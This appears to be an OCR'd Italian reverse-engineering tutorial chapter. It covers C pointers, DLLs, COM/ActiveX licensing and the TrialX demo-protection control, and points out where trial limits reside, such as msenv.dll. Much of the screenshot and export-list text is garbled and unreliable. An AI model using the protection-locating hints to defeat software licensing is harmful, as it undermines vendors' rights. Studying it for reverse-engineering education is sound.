_array_due[ecx*4], eax 

jmp SHORT $L29 


$L30: 
mov esp, ebp 
pop ebp 
ret (0) 


_Copy_array ENDP 


CON ARITMETICA PUNTATORI CON CICLO FOR 


Che ne dite !? Visto che i puntatori poi alla fine non sono neppure male ? 
Prendiamo sempre ad esempio il C il quale possiede un aritmetica degli indirizzi 
paurosa. 

I linguaggi a più alto livello trattano le variabili in modi più trasparenti 
agli utenti. 

In Basic ad esempio se dichiaro una variabile che conterrà un valore non mi 
dovrò preoccupare di dove questa è ubicata in memoria. 

Il C spesso lo pretende e spesso di questo ci si può avvantaggiare per creare 
costrutti potenti. 


Provate a creare una funzione che esegua la copia degli elementi di due array, 
come nel caso precedente, usando solo un assegnazione. 
Seguite il ragionamento 


struct X { int a[10]; } 


dichiara in C la formazione di una fatidica struttura X che contiene un solo 
array di 10 elementi (attenzione che non lo alloca ma che ne definisce solo le 
caratteristiche). 

Successivamente ho i miei due arrays: 


int array_uno[10] = { 1, 2, 3, 4, 5, 6, 7, 8, 9, 0 }; 
int array_due[10]; 


Se a questo punto avessi 


&array_due[0] 


sarebbe come dire “l’ indirizzo di un intero relativo al primo elemento di 
array_due. 
Se tramutassi tutto in 


*(&array_due[0]) 


avei “il contenuto dell’indirizzo di un intero relativo al primo elemento di 
array_due ovvero l’oggetto puntato dall'indirizzo di array_uno[0]”. 

Ma se a questo punto eseguissi il cast (forzatura) e convincessi il compilatore 
che l'indirizzo &array_due[0] è quello di una struttura Xx e non di un intero, 
con 


(*((struct XxX *)&array_due[0])) 


sarebbe come dire “il contenuto dell’ indirizzo di una struttura X”. 
A questo punto facendo 


(*((struct Xx *)&array_due[0])) = (*((struct XxX *)&array_uno[0])); 


direi “prendi il contenuto all’indirizzo della struttura X array_uno e mettilo 
come contenuto all’indirizzo della struttura X array_due. 

Ed ecco fatto il passaggio dei dieci valori di un array dentro ad un altro senza 
passare dal ciclo for. 

Ma questo solo indirettamente in quanto il compilatore creerà una struttura in 
assembler simile a quella che veniva generata con il codice in C visto prima, 
quello del for (come abbiamo visto prima neppure tanto). 

Vedremo più avanti in modo più approfondito il discorso degli indirizzi. 

Le funzioni dentro alle librerie statiche (.LIB) sono racchiuse come moduli 
.0BJ. 

Infatti il .LIB viene creato con l’utility LIB.EXE che prende il .0BJ e lo 
accoda in una file .LIB segando dove si trova in una tabella convenzionale. 
Volendo potremmo tenere le nostre funzioni di libreria come moduli .0BJ e 
potremmo linkarli al nostro programma in fase di LINK. 

Un altro tipo di libreria è quella dinamica la quale viene inclusa nel programma 
in fase di esecuzione. 

Queste sono quelle che possiedono come estensione .DLL. 

Le DLL che contengono le funzioni richiamate nel nostro programma devono essere 
fornite con il programma eseguibile, in caso contrario verrà segnalato un 
errore. 

Negli ultimi anni sono state sviluppate altre tecniche che permettono il 
riutilizzo binario del codice e precisamente le metodologie legate alle OLE e a 
tutti i suoi derivati (metodologie COM, DCOM ecc.) 


In ogni caso dal punto di vista concettuale il programma cambia poco in quanto 
la differenza in pratica è solo quella di come deve essere reperita una certa 
funzione richiamata nel software. 
Questi moduli al momento dell’esecuzione dovranno essere presenti in memoria. 
Nel caso di librerie statiche queste vivono collegate al programma eseguibile 
per cui vengono caricate al momento del caricamento di quest’ultimo. 
Nel caso di DLL queste dovranno essere presenti sul sistema in qualche posizione 
dove Windows riesce a trovarle (sotto \widows, sotto \windows\system o sotto 
patch). 
In questo caso il software dovrà eseguire il caricamento della libreria mediante 
una funzione appartenente alle API di Windows e precisamente con LoadLibrary. 
Le funzioni inserite nella DLL letta verranno caricate in memoria dove il 
software riuscirà a trovarle e ci rimarranno sino ad una chiamata ad un altra 
funzione Windows ovvero FreeLibrary la quale libererà la memoria occupata. 
I controlli ActiveX, ultima evoluzione by Microsoft dei controlli Ole, 
possiedono la visione molto più vicina ad oggetti con incapsulati al suo interno 
metodi e proprietà. 
Normalmente questo tipo di controlli vengono inglobati all’interno di dialog o 
di forms dentro alle quali svolgono il loro ciclo di vita. 
Supponiamo che ci troviamo dinanzi ad un controllo ActiveX destinato 
all'elaborazione delle immagini. 
Mediante le apposite opzioni dell’ IDE utilizzato per la stesura del programma 
inseriremo il controllo in una dialog ed a questo gli assegneremo un 
identificatore che ci permetterà di vederlo come un oggetto all’interno del 
codice. 
Generalmente le proprietà di un controllo ActiveX possono essere settate tramite 
un apposita maschera disposta dal controllo stesso. 
Nelle seguenti immagini viene mostrato l’inserimento di un controllo ActiveX 
dentro ad un programma Visual C++. 
I controlli devono essere registrati 
nel sistema Windows, prima di essere 
Componente and Control: Gallery E eT=] utilizzati, mediante l’utility 
regsvr32.exe. 
Spesso questo tipo di controlli 
S| dl fa dispongono di routines interne per 


Choose a component lo nesit nio pour project. 


Cerca int | I Pegistered Acbwe Contiots 


L| Video cht Flesir1g, Conlioî ET crobst Contro] la serializzazione al fine di 

Videos oft FeStiing Control MEI AciveBar Class proteggerle dalla divulgazione non 
Bi | Vidz0S cit v:Draw Contid EI Activacicek Cai autorizzata. 

-| pol ot sinFom Control lo] Achei velo Il richiamo dei metodi lo) il 


-|Wid=03 ot vPrinier3 Contro! lx] ActiveSelup.Ts 


settaggio dei parametri avviene con 
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la sintassi classica del metodo ad 
3] oggetti. 


Supponiamo che al momento 
: | aa È 
ca; dell'inserimento del lo 


controllo 
| Close | chiamiamo m_Imaggine e che lo stesso 
possieda un metodo chiamato 


SetCaption(). 


La sintassi sarebbe 


m_Immagine .SetCaption(“Caption text”); 


I controlli ActiveX sono uno dei punti evolutivi della metodologia OLE creata 
dalla Microsoft passata attraverso, da prima, le DLL per poi giungere ai VBX ed 
arrivare agli OCX. 

Riassumendo possiamo dire che le funzioni offerte da librerie possono essere 
contenute in LIB statiche le quali vengono collegate al programma in fase di 
link. 

Le DLL possono essere caricate dal programma tramite funzioni in modo dinamico 
al momento del caricamento del programma. 

Gli ActiveX verranno caricati automaticamente. 


La visione di come e quando vengono caricate le funzioni esterne presenti in 

questi moduli è importante nell’istante in cui si esegue il debug di un 

programma in quanto spesso il trace esce da questo per entrare dentro ad una di 

queste librerie. 

Per questo motivo alcuni disassemblatori possiedono dei flags che è possibile 
settare per fare in modo 
che il debugger stesso 


‘=== P i E ; 

r— Source For Data Disp 2 Active DILS copv/| indichi l’ent rata e 

(raso 1 Address: 81524D38 is Mor in a Loaded Module AD az.D l'uscita da uno di questi 
char[000] :"" DE z moduli. 


DUO RD:33395000, WOPRD:800C, BYTE: De 


Nell'immagine a fianco è 
dl CERERE mostrato WDASM 8.9 e in 
sonul tura Create Brk basso è possibile vedere i 
Ey0002 Loading Dil OLEAUT92.DIL A addr:65940000 en) re ine De vari flags che indicano se 
Modify Data Goto Current Bip PLL UnLoad Brk deve essere eseguito un 
break entrando ed uscendo 
da una DLL ecc. 
Vedremo più avanti il problema dal punto di vista pratico. 
Spesso delle funzioni di protezione dei programmi sono appunto inserite dentro a 
delle DLL e non dentro al codice principale del file eseguibile. 
Ad esempio nei programmi come Visual J++ della Microsoft la limitazione a 60 
giorni del dimostrativo è situato dentro alla DLL msenv.dll. 
Sempre legata all’aritmetica dei puntatori è possibile trovare alcuni sutterfugi 
adatti a far perdere la testa. 
Il seguente è un metodo che io stesso usavo diversi anni fà. 
In pratica un programma è composto da molte funzioni le quali vengono richiamate 
durante l’esecuzione del programma. 
Facendo l’esempio in Linguaggio C potremmo avere 


CODE: or al, 80 


void function_a(void) 


{ 


void function _b(void) 


{ 


function_a(); 
function_b(); 


Sarebbe possibile fare un bella cosa sfruttando gli indirizzi. 
In pratica si dichiara un array di puntatori a funzioni ai quali si assegnano 
gli indirizzi delle funzioni. 


void func_a(void); 
void func_b(void); 


void (*func[])() = { func_a, func_b }; 


void func_a(void) 


{ 
printf("Uno"); 


void func_b(void) 


{ 
printf("Due"); 


void main(void) 


(*func[0])(); 
(*func[1])(); 


} 


Usando l’indirizzamento in questo modo capirete che è facile usare calcoli su 
stringhe di codici o di copyright come indici per indirizzare le funzioni, per 
cui i disassemblatori, che ricostruiscono le tabelle da cui è possibile capire 
quali sono le funzioni richiamate, vanno in tilt (non vi mostrano i nomi delle 
funzioni). 


GERARCHIA DELLE FUNZIONI 


Abbiamo detto che molte funzioni usate dai linguaggi convenzionali sono 
residenti dentro a quelle chiamate librerie. 

Ho detto relative ai linguaggi convenzionali in modo errato visto che nessuno ci 
vieta di crearci anche noi le nostre librerie personali. 

Comunque in ogni caso senza supportarci su questa possibilità generalmente le 
funzioni che risiedono in librerie sono quelle legate ai vari RunTime. 

Nel capitolo legato agli interrupts a all’assembler ho detto che il sistema 
elettronico del sistema può essere visto come un certo numero di processori 
dedicati alle varie funzioni che offrono delle porte di 1/0 per permettere la 
loro programmazione. 

Questo livello in genere è sufficientemente basso tanto da rendere complessa la 
progettazione logica e la programmazione dei software. 

Per risolvere questo problema i sistemisti che hanno prodotto i PC hanno fornito 
un primo livello software gestito tramite 
interrupts i quali fornivano delle 
funzionalità di base per la programmazione 

di tali periferiche. 


Questo comunque, il livello BIOS, è ancora 
sufficientemente basso tanto che la 


Microsoft ha alzato tale livello fornendo 


un sistema operativo il quale sfruttando Risto 

tali servizi ne offriva degli altri più 

complessi ed evoluti. kernel 

Lo stesso discorso lo possiamo fare per 

quanto riguarda le librerie. _sse_] 

Windows in certe DLL (user32.dl1, —[ com _] 
kernel32.dl1 ecc.) offre un certo numero di Gernsi 


funzioni, abbastanza elevato, che possono 
essere utilizzate per la creazione di 


programmi. goi 
Queste funzioni non sono legate ad Î rest. 
algoritmi generali ma sono destinate 

all’interazione con Windows. [ keyboard | 
Fanno parte di queste funzioni come : [ user 


GetDlgItem, GetWindowText ecc. 

Anche i linguaggi che verso l'utente 
utilizzano altre nomenclature per svolgere (ee z| 
funzioni simili spesso si agganciano alle keyboard | 
librerie di Windows per l’esecuzione di 

certe funzionalità. 
É già stato detto in altro luogo che [ kernel 
esistono due metodi per collegarsi ad un 
DLL e precisamente quelli che seguono. 

Il primo è quello di eseguire il link di 
una libreria generalmente fornita con la 

DLL la quale pensa ad eseguire kernel 
l’interfacciamento del nostro programma con 
quest’ultima. 


gdi 


kernel 


kernel | 


Il secondo metodo è quello di eseguire la lettura dinamicamente della DDL con 
funzioni tipo LoadLibrary. 

Una funzione attiva sotto Windows può essere vista come in istanza per cui dopo 
la creazione del link dinamico è possibile creare istanze di funzioni presenti 
nelle DLL. 

In ogni caso vedrete che moltissime, se non tutte, DLL a sua volta leggono 
user32.dl1 ecc. tanto da poter vedere il tutto come un albero gerarchico di 
collegamenti. 

Potete vedere qui a fianco che dalla DDL VBRUN300 partono i link con le DLL 
USER, KERNEL ecc. 

Altre DLL che non sono al primo livello alla fine utilizzano funzioni contenute 
in kernel32.dll e nelle altre di sistema. 

Spesso librerie utilizzate da più programmi risiedono in directory condivise o 
dentro a windows\system. 

DLL utilizzate soltanto da singoli programmi vengono in genere posizionate nelle 
stesse directory dei programmi. 

La ricerca parte dalla directory in cui si è posizionati per seguire quelle 
incluse nella specifica PATH del Dos per giungere in windows e windows\system. 
Le librerie statiche invece vengono collegate in fase di link al programma e non 
sono residenti su file esterni. 

Questo secondo metodo viene utilizzato in particolar modo con i vecchi programmi 
DOS anche se di fatto anche in sistemi come nelle ultime versioni di Visual C++ 
è possibile collegare staticamente le librerie MFC. 

Tutte le funzioni utilizzate nei programmi partono come flusso di chiamate da 
quella che potrebbe essere definita come main function. 

In C questa funzione prende il nome di WinMain mentre in assembler potremmo 
definirlo soltanto come entrypoint del software. 

I programmi in Windows 3.1 chiamavano prima di WinMain tre funzioni semi 
documentate ovvero InitTask(), InitApp e WaitEvent(). 

In Win32 prima di WinMain veniva chiamata la funzione WinMainCRTStartup() mentre 
per i programmi console il nome era mainCRTStartup(). 

Generalmente il compilatore, tra le tante cose che aggiunge, ci mette anche 
questa funzione ma solo nel caso in cui questa non esista. 

In altre parole il programmatore potrebbe scrivere lui questa funzione. 

Una libreria di funzioni potrebbe essere vista come una metodologia per il 
riutilizzo del codice. 

In pratica una funzione sufficientemente generica e con uno scopo non limitato 
ad un solo programma, potrebbe essere inserita in una libreria e successivamente 
riutilizzata in altri programmi. 

Microsoft per garantire la riusabilità del software a livello binario ha puntato 
sulla tecnologia OLE. 

Dalla fine degli anni 80 la tecnologia OLE ha subito un infinità di modifiche 
sino ad abbracciare la nuova tecnologia legata al modello COM. 

Molte funzionalità nei programmi al giorno d’oggi sono sviluppate mediante 
questa tecnologia. 

Nei programmi venduti sono sempre più presenti moduli OCX nelle quali sono 
incapsulate tutte i metodi relativi a determinate gestioni. 

Le librerie di funzioni, come ad esempio quelle legate alla grafica, sono 
distribuite in questo formato e non è raro trovare sistemi di protezione 
software aderenti a questo filone. 

Il lato positivo di questa metodologia è che l'integrazione tra componenti 
diverse, sviluppati in tempi differenti e da vari autori, avviene a livello di 
codice oggetto e non di sorgente. 

Aderire a questo standard porta ad una serie di vantaggi tra cui 
l’interoperabilità tra componenti diversi, l’indipendenza dal linguaggio e la 
compatibilità a ritroso verso precedenti versioni dello stesso componente. 

Lo standard COM dispone di interfacce che possono essere viste come una 
collezione di funzioni la cui sintassi una volta definita rimane immutata. 

Tutte le funzionalità degli oggetti COM sono rese disponibili tramite queste 
interfacce. 

Ogni componente viene implementato come un puntatore ad una v-table, ovvero una 
tabella di puntatori a funzione. 


Su un volume avevo letto una volta una metafora che rendeva bene l’idea usando 
il concetto di contratto. 

In pratica un oggetto COM veniva paragonato a questo in quanto quando dichiarava 
di supportare una certa interfaccia ComInterface, ad esempio, assicurava per 
contratto l’implementazione di tutte le funzioni previste. 

Il modello COM ha come base di tutti i suoi componenti l’interfaccia Iunknow 
composta da tre funzioni di base : AddRef(), Release(), QueryInterface(). 

Le prime due gestiscono un meccanismo interno di conteggio delle referenze. 
Tutte le volte che l’oggetto viene connesso un contatore interno viene 
incrementato e inversamente viene decrementato quando questo viene rilasciato. 
Il metodo QueryInterface() invece ha il compito di attivare il processo di 
interoperabilità tra componenti e il suo supporto. 

Questo metodo è obbligatorio per tutti gli oggetti COM. 

Esiste una specie di analogia tra le classi del C++ e gli oggetti COM anche se 
uno è a livello sorgente mentre l’altro a livello binario. 

Tutte e due possono essere viste come riferimenti a una tabella di funzioni che 
elenca i servizi che possono servire. 

ActiveX dispone di un sistema particolare per la gestione delle licenze. 

Per fare questo MFC mete a disposizione uno schema di base in grado di 
soddisfare la maggior parte delle esigenze in questo settore. 

Come dicevo prima ActiveX si basa sulla metodologia delle interfacce e anche per 
l’implementazione delle licenze viene eseguita tramite quella chiamata 
IclassFactory2 che comprende alcuni metodi che sono abbastanza semplici da 
scrivere. 

Quando una software house scrive una controllo ActiveX e lo mette in vendita sa 
che l’acquirente lo utilizzerà nella sua applicazione e che quindi distribuirà 
il file .ocx che contiene i metodi ad altre persone. 

Il problema della licenza cerca di risolvere il problema dell’uso non 
autorizzato di questa. 

Chi riceve l’applicazione potrebbe tranquillamente inserire il controllo 0CX 
dentro ad un suo programma, una pagina html o qualsiasi software che supporti 
questa metodologia. 

Il sistema delle licene dovrebbe innanzi tutto differenziare quello che l’uso 
del controllo in un ambiente di sviluppo da quello di runtime. 

Avrete visto in giro per i vostri dischi dei file .LIC. 

Questi sono file di licenza utilizzati con controlli O0CX che avete installato 
con qualche sistema di sviluppo o a seguito di qualche applicativo generale. 

La classe di gestione delle licenze, ICLasFactory2, deriva dalla classe 
IClassFactory rispetto alla quale dispone solo di alcuni metodi in più. 

Il metodo GetLicInfo recupera le informazioni che riguardano l’attuale licenza 
del controllo. 

Se il controllo lo supporta, il metodo RquestLicKkey gli chiede una copia run- 
time della licenza. 

Il metodo CreateInstanceLic è analogo a CreateInstace salvo che prende come 
parametro la chiave di licenza. 

Esistono metodi come GetLicInfo, RequestLickey e CreateIlnstanceLic che 
costituiscono le basi per tutti i controlli di licenza. 

La chiave di licenza viene trattata come un BSTR anche se di fatto può contenere 
qualsiasi dato compresi dei NULL. 


ACTIVE X PER SISTEMI DI CREAZIONE DEMO 


Come dicevo prima gli ActiveX stanno diventando uno standard anche nel campo 
delle protezioni da copia e per i sistemi di creazione demo. 

Un prodotto commerciale legato a questa tecnologia è TrialX. 

Questo controllo ActiveX è in grado di essere implementato in qualsiasi 
programma per creare versioni dimostrative anche molto complesse. 

TrialX mantiene le informazioni relative al programma e all'utente in un suo 
database non visibile. 


TrialX esiste in tre versioni che dispongono delle seguenti possibilità (leggete 
il capture della pubblicità di TrialX): 


- Standard Edition-The Standard Edition includes all of the Free Edition 
features plus it provides complete control over the duration of the trial. It 
is limited to day limited trials. You cannot change the style of trial. 

Developer Edition-The Developer Edition includes all of the Standard 
Edition features plus it provides complete control over both the style and 
duration of the trial. It supports day locks, time locks, run locks, feature 
locks and date locks. You have complete control over the appearance, 
style and duration of the trials. You cannot extend, remove or otherwise 
control the trial remotely. 

Professional Edition-The Professional Edition includes all of the 
Developer Edition features plus it provides complete remote control over 
trial for extensions, removals and updates to the trial. It also provides 
localization capabilities so that you can create custom localized versions 
of your trials. 


TrailX si basa sulla DLL o sull’ OCX TRXTD200.DLL. 


General informations : c:\Windows\SYSTEM\Trxtd200.dll 


Last update : 15/06/99 

File size : 475 136 byte(s) 

Module type : WINDOWS Dynamic links library (32 bits) 
FileDescription : Secure Trials of Your Real Software 
FileVersion : 2.02.0071 

CompanyName : Modern Software Publishing, Inc. 
LegalCopyright : ©1999 Modern Software Publishing, Inc. All rights reserved. 
InternalName : trxtd200 

OriginalFilename : trxtd200.dl1 

ProductName : Modern TrialX 2.0 (DLL) 

ProductVersion : 2.02.0071 


La DLL esporta le seguenti funzioni 


Exported functions : c:\Windows\SYSTEM\Trxtd200.dll 


© D11CanUnloadNow 

1 D1llGetClassObject 

2 DllRegisterServer 

3 DllUnregisterServer 


ed importa dalla DLL relativa alla Virtual Machine di Visual Basic 6.0 


Imported functions : c:\Windows\SYSTEM\Trxtd200 .dll 


MSVBVM60 © DllFunctionCall 

MSVBVM60 O EVENT_SINK_AddRef 
MSVBVM60 O EVENT_SINK_GetIDsOfNames 
MSVBVM60 © EVENT_SINK_Invoke 
MSVBVM60 O EVENT_SINK_QueryInterface 
MSVBVM60 O EVENT_SINK_Release 
MSVBVM60 0 MethCallEngine 

MSVBVM60 0 ProcCallEngine 

MSVBVM60 0 Zombie GetTypeInfo 
MSVBVM60 0 Zombie _GetTypeInfoCount 
MSVBVM60 0 __vbaExceptHandler 


La DLL si riferisce direttamente ed indirettamente alle seguenti DLL di sistema 
e di RunTime. 


Imported functions c:\Windows\SYSTEM\Trxtd200.dl1l 


MSVBVM60 © DllFunctionCall 

MSVBVM60 O EVENT_SINK_AddRef 
MSVBVM60 O EVENT_SINK_GetIDsOfNames 
MSVBVM60 © EVENT_SINK_Invoke 
MSVBVM60 O EVENT_SINK_QueryInterface 
MSVBVM60 O EVENT_SINK_ Release 
MSVBVM60 0 MethCallEngine 

MSVBVM60 0 ProcCallEngine 

MSVBVM60 0 Zombie GetTypeInfo 
MSVBVM60 0 Zombie _GetTypeInfoCount 
MSVBVM60 0 __vbaExceptHandler 


LIBRERIA MACCHINA VIRTUALE VISUAL BASIC 6.0 


Un discorso particolare in relazione alle librerie va fatto per quanto riguarda 
quelle di un dei linguaggi più utilizzati ovvero Visual Basic. 

Moltissimi programmi fanno riferimento alle librerie di VisualBasic 6.0, ad 
esempio anche TrialX che abbiamo appena visto. 

Il file di RunTime si chiama MSVBVM60.DLL e come dice il nome con precisione è 
relativo alla macchina virtuale di VB. 

I dati precisi sono 


General informations f:\WINNT\SYSTEM32\MSVBVM60 .DLL 
Last update 26/04/99 


File size : 1 409 024 byte(s) 

Module type : WINDOWS Dynamic links library (32 bits) 
FileDescription : Visual Basic Virtual Machine 
FileVersion 6.00.8244 

CompanyName Microsoft Corporation 

LegalCopyright Copyright © 1987-1998 Microsoft Corp. 
InternalName MSVBVM60 . DLL 

ProductName : Visual Basic 

ProductVersion 6.00.8244 


+/32Dasm Alphabetical List of Imported Functions (_ [DYx| 


Cancel Search | 


Utilizzando WDASM ci Si 
ritrova dinanzi ad una 


To Search Disassembly for Function, Double Click on Text 


finestra relativa alle MSYVBVMEO _ vbaAryD estruct 
funzioni importate del MSVBVMEO._vba&yLock È 
MSVBVMEO.__vba&yUnlock 


tipo riportato qui a 
fianco. 

La seguente lista mostra 
le funzioni esportate da 
MSVBVM60 . DLL 


MSYVBVMEO. 
MSYVBWMEO. 
MSVBWMEO. 
MSYBWM60__vbaCastObj 

MSYBWM60.__vbaCastObjvar 
\__vbaCheckType 


vbaBoolStr 
vbaBool/ar 
vbaBoolarNull 


\__vbaCheckTypeW'ar 
.__vbaChkstk 
__vbaDateR® 
\__vbaDateY'ar 
.__vbaEnd 
._baErrorOyerflow 
.__vbaExceptHandler 
MSYBYVMEO._ vbaExitE achColl 


p:| 
Copy All | Copy View | 


Exported functions f:\WINNT\SYSTEM32\MSVBVM60 .DLL 


© ThunRTMain 


1 VBD11UnRegisterServer 


2 VBD11CanUnloadNow 
3 VBDllRegisterServer 


4 VBD11GetClassObject 
5 UserDllMain 

6 DllRegisterServer 

7 DllUnregisterServer 


8 __vbaAryLock 

9 __vbaBoolErrVar 

10 _ _vbaRedimVvar2 

11 _ _vbaStrErrVarCopy 


13 


__vbaVarLateMemCallLd 


__vbaVarLateMemCallLdRf 


14 
15 
16 
17 
18 
19 
20 
21 
22 
23 
24 
25 
26 
27 
28 
29 
30 
31 
32 
33 
34 
35 
36 
37 
38 
39 
40 
41 
42 
43 
44 
45 
46 
47 
48 
49 
50 
DI 
52 
53 
54 
55 
56 
57 
58 
59 
60 
61 
62 
63 
64 
65 
66 
67 
68 
69 
70 
T1 
12 
73 
TA 
75 
76 
TT 
78 
79 
80 
81 
82 
83 
84 
85 
86 
87 
88 


_ vbaVarLateMemCallSt 
_ vbaVarLateMemSt 
_ vbaVarLateMemStAd 
_ vbaAryVarVarg 

_ vbaFpCDblRr4 

_ VvbaFpCDblR8 

_ vbaFpCsngR4 

_ vbaFpCsngR8 

__ vbaFpCmpCy 

_ vbaFpCy 

_ VvbaFpI2 

_ VvbaFpI4 

_ vbaFpR4 

_ vbaFpR8 

_ vbaFpUuIl 

_ vbaFree0bj 

_ vbaFreeStr 

_— vbaFreeVar 

_— vbaFreeVarg 

_ vbaI2Abs 

_ vbaI214 

_ VvbaI2zSgn 

_ vbaI4Abs 

_ vbaI4Sgn 

_ vbaStrCopy 

_ vbaStrMove 

_ vbaUI1lI2 

_ vbaUIlI4 

_ vbauI1Sgn 

_ vbaVarCopy 

_ vbaVarDup 

_— vbaVarMove 

_— vbaVarVargNofree 
_ vbaVvarzero 

_ vbaVargParmRef 
_ VvbaVargVvar 

_ vbaVargVvarCopy 
_— vbaVargVvarMove 
_ VvbaVargVarRef 
DLLGetDocumentation 
D1I1CanunloadNow 
D11GetClassObject 
_CIatan 

_CICcOS 

_CIexp 

_CIlog 

_CIsin 

_CIsqrt 

_CItan 

_ vbaAptoffset 

_ vbaAryConstruct2 
_ VvbaAryConstruct 
__ VvbaAryCopy 

_ VvbaAryDestruct 
_ vbaAryMove 

_ VbaAryRebaselVar 
_ VvbaAryRecCopy 
_ VvbaAryRecMove 
_ VvbaAryUnlock 

_ VvbaAryVar 

_— vbaBoolStr 

_ vbaBoolVvar 

_ vbaBoolVvarNull 
_ vbaCVarAryUdt 

_ vbaCastObj 

_ vbaCastObjVar 

_ vbaCheckType 

_ vbaCheckTypeVar 
_ vbaChkstk 

_ VvbaCopyBytes 

_ vbaCopyBytesZero 
_ vbaCyAbs 
ProcCallEngine 
DIlFunctionCall 
_ vbaCyAdd 


89 __vbaCyErrVar 

90 CopyRecord 

91 __vbaCyFix 

92 __vbaCyForInit 

93 _ _vbaCyForNext 

94 __vbaCyI2 

95 
TipGetAddressOfPredeclaredIn 
stance 

96 __vbaCyI4 

97 _ _vbacyInt 

98 __vbaCyMul 

99 MethCallEngine 

100 _ _vbaCyMulI2 

101 __vbaCySgn 

102 _ _vbaCyStr 

103 _ _vbaCySub 

104 _ _vbaCyUI1l 

105 _ _vbaCyVar 

106 __ _vbaDateR4 

107 _ _vbaDateR8 

108 _ _vbaDateStr 

109 __vbaDateVar 

110 _ _vbaDerefAry 

111 __vbaDerefAry1 

112 __vbaend 

113 __vbaErase 

114 _ _vbaEraseKeepData 

115 _ _vbaEraseNoPop 

116 __vbaError 

117 _ _vbaerroroverflow 

118 _ _vbaExceptHandler 

119 _ _vbaExitEachAry 

120 TipSetOption 

121 _ _vbaExitEachColl 

122 _ _vbaExitEachVar 

123 _ _vbaExitProc 

124 __vbaFPException 

125 __vbaFPFix 

126 __vbaFPInt 

127 TipUnloadProject 

128 _ _vbaFailedFriend 

129 _ _vbaFileClose 

130 
TipCreateInstanceProject2 

131 EbResetProject 

132 
EbGetHandleOfExecutingProjec 
t 

133 _ _vbaFileCloseAll 

134 _ _vbaFileLock 

135 _ vbaFileOpen 

136 _ _vbaFileSeek 

137 _ vbaFixstrConstruct 

138 _ _vbaForEachAry 

139 __vbaForEachCollAd 

140 _ _vbaForEachCollObj 

141 _ _vbaForEachCollVar 

142 __vbaForEachVar 

143 _ vbaFreeObjList 

144 _ _vbarreeStrList 

145 __vbaFreevarList 

146 
_ _vbaGenerateBoundsError 

147 _ vbaGet3 

148 __vbaGet4 

149 __vbaGetFxStr3 

150 _ _vbaGetFxStr4 

151 _ _vbaGetOwner3 

152 _ _vbaGetOwner4 

153 _ _vbaGosub 

154 __ _vbaGosubFree 

155 _ _vbaGosubReturn 

156 _ _vbaHresultCheck 

157 
__vbaHresultCheckNonvirt 

158 _ _vbaHresultCheckObj 

159 __vbaI2Cy 


160 __vbaI2ErrVar 
161 __vbaI2ForNextCheck 
162 __vbaI2Str 
163 __vbaI2Var 
164 __vbaI4Cy 
165 EbResetProjectNormal 
166 TipunloadInstance 
167 __vbaI4ErrVar 
168 EbLibraryLoad 
169 EbLibraryUnload 
170 __ _vbaI4ForNextCheck 
171 EbLoadRunTime 
172 __vbaI4Str 
173 __vbaI4Var 
174 EbCreateContext 
175 EbDestroyContext 
176 
EbSetContextWorkerThread 
177 _ _vbaInStr 
178 __vbaInStrB 
179 __vbaInStrVar 
180 __vbaInStrVarB 
181 _ _vbaInputFile 
182 _ _vbaLateIdCall 
183 _ _vbaLateIdCallLd 
184 EbGetErrorInfo 
185 _ _vbaLateIdCallSt 
186 _ _vbaLateIdNamedCall 
187 _ vbaLateIdNamedCallLd 
188 _ _vbaLateIdNamedCallSt 
189 _ _vbaLateIdNamedStAd 
190 _ _vbaLateIdSt 
191 _ _vbaLateIdStAd 
192 _ _vbaLateMemCall 
193 _ _vbaLateMemCallLd 
194 _ _vbaLateMemCallSt 
195 _ _vbaLateMemNamedCall 
196 
_ _vbaLateMemNamedCallLd 
197 
_ _vbaLateMemNamedCallSt 
198 EbIsProjectOnStack 
199 TipCreateInstanceEx 
200 GetMem2 
201 GetMem4 
202 GetMem8 
203 GetMemStr 
204 GetMemVar 
205 GetMem0bj 
206 PutMem2 
207 PutMem4 
208 PutMem8 
209 PutMemStr 
210 PutMemVar 
211 PutMem0Obj 
212 SetMemVar 
213 SetMem0bj 
214 GetMemNew0b]j 
215 PutMemNew0bj 
216 SetMemNew0bj 
217 GetMem1 
218 PutMem1 
219 GetMemEvent 
220 PutMemeEvent 
221 SetMemEvent 
222 __vbaLateMemNamedStAd 
223 __vbaLateMemSt 
224 __vbaLateMemStAd 
225 __vbaLbound 
226 _ _vbaldZeroAry 
227 _ vbaLenBstr 
228 __vbaLenBstrB 
229 __vbaLenVar 
230 __vbaLenvarB 
231 _ _vbalineInputStr 
232 _ _vbalineInputVar 
233 _ _vbaLsetFixstr 
234 __vbaLsetFixstrFree 


235 _ _vbaMidStmtBstr 
236 _ _vbaMidStmtBstrB 
237 _ vbaMidStmtVar 

238 _ _vbaMidStmtVarB 
239 _ _vbaNameFile 

240 __vbaNew2 

241 __vbaNew 

242 __vbaNextEachAry 
243 __vbaNextEachCoLllAd 
244 __vbaNextEachCollObj 
245 __vbaNextEachCollVar 
246 __vbaNextEachVar 
247 _ vbaObjAddref 

248 _ _vba0bjIs 

249 __vba0bjSet 

250 __vba0bjSetAddref 
251 __vbaObjVar 

252 __vbaOnerror 

253 __vbaOnGoCheck 

254 __vbaPowerR8 

255 _ _vbaPrintFile 

256 _ _vbaPrintObj 

257 _ vbaPut3 

258 _ _vbaPut4 

259 __vbaPutFxStr3 

260 __vbaPutFxStr4 

261 __vbaPutOwner3 

262 __vbaPutOwner4 

263 __vbaR4Cy 

264 __vbaR4ErrVar 

265 __vbaR4ForNextCheck 
266 __vbaR4Sgn 

267 _ _vbaR4Str 

268 __vbaR4Var 

269 __vbaR8Cy 

270 __vbaR8ErrVar 

271 _ _vbaR8FixI2 

272 __vbaR8FixI4 

273 __vbaR8ForNextCheck 
274 _ _vbaR8IntI2 

275 _ _vbaR8IntI4 

276 __vbaR8Sgn 

277 _ _vbaRgstr 

278 __vbaR8var 

279 _ _vbaRaiseEvent 

280 _ _vbaRecAnsiToUni 
281 _ _vbaRecAssign 

282 _ _vbaRecDestruct 
283 _ _vbaRecDestructAnsi 
284 __vbaRecUniToAnsi 
285 __vbaRedim 

286 __vbaRedimPreserve 
287 _ _vbaRedimPreserveVar 
288 __vbaRedimPreserveVar2 
289 __vbaRedimVvar 

290 __vbaRefVarAry 

291 __vbaResume 

292 _ _vbaRsetFixstr 

293 _ _vbaRsetFixstrFree 
294 __vbaSetSystemError 
295 _ _vbaStopExe 

296 __vbaStr2Vec 

297 _ vbaStrAryToAnsi 
298 _ _vbaStrAryToUnicode 
299 __vbaStrBool 

300 


EVENT_SINK_QueryInterface 


301 EVENT_SINK_AddRef 
302 EVENT_SINK_Release 
303 


EVENT_SINK_Get IDsOfNames 


